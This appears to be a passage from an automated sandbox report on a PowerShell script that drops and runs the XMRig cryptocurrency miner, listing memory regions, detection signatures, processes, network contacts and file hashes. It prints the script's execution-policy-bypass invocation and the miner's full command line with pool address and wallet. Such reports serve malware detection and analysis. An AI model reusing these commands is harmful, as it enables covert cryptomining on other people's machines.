memory/3044-50-0x00007FFB21400000-0x00007FFB21EC2000-memory.dmp

memory/3044-52-0x00007FFB21400000-0x00007FFB21EC2000-memory.dmp

memory/596-51-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-53-0x000001B43CD00000-0x000001B43CD20000-memory.dmp

memory/596-54-0x000001B43CD30000-0x000001B43CD50000-memory.dmp

memory/596-55-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-56-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-57-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-58-0x000001B43CD00000-0x000001B43CD20000-memory.dmp

memory/596-59-0x000001B43CD30000-0x000001B43CD50000-memory.dmp

memory/596-60-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-61-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-62-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-63-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-64-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-65-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-66-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-67-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-68-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-69-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-70-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-71-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-72-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-73-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-74-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-75-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-76-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-77-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-78-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-79-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-80-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-81-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-82-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-83-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-84-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-85-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-86-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-87-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-88-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-89-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-90-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-91-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-92-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-93-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-94-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-95-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-96-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-97-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-98-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-99-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-100-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-101-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-102-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-103-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-104-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-105-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-106-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-107-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-108-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-109-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-110-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-111-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-112-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-113-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-114-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-115-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-116-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-117-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

memory/596-118-0x00007FF7626A0000-0x00007FF7632D3000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:38

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1788s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 169.253.116.51.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/2828-0-0x00007FFA7ECD3000-0x00007FFA7ECD4000-memory.dmp

memory/2828-5-0x000001F678510000-0x000001F678532000-memory.dmp

memory/2828-8-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

memory/2828-9-0x000001F678640000-0x000001F6786B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0slzx3fw.ncq.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2828-10-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

memory/2828-26-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

memory/2828-49-0x000001F678490000-0x000001F6784A2000-memory.dmp

memory/2828-62-0x000001F678480000-0x000001F67848A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2808-91-0x00000233354B0000-0x00000233354D0000-memory.dmp

memory/2828-92-0x00007FFA7ECD3000-0x00007FFA7ECD4000-memory.dmp

memory/2828-93-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

memory/2808-94-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-95-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-96-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-97-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-98-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-99-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-100-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-101-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-102-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-103-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-104-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-105-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-106-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-107-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-108-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-109-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-110-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-111-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-112-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-113-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-114-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-115-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-116-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-117-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-118-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-119-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-120-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-121-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-122-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-123-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-124-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-125-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-126-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-127-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-128-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-129-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-130-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-131-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-132-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-133-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-134-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-135-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-136-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-137-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-138-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-139-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-140-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-141-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-142-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-143-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-144-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-145-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-146-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-147-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-148-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-149-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-150-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-151-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-152-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-153-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-154-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-155-0x00007FF787B60000-0x00007FF788793000-memory.dmp

memory/2808-156-0x00007FF787B60000-0x00007FF788793000-memory.dmp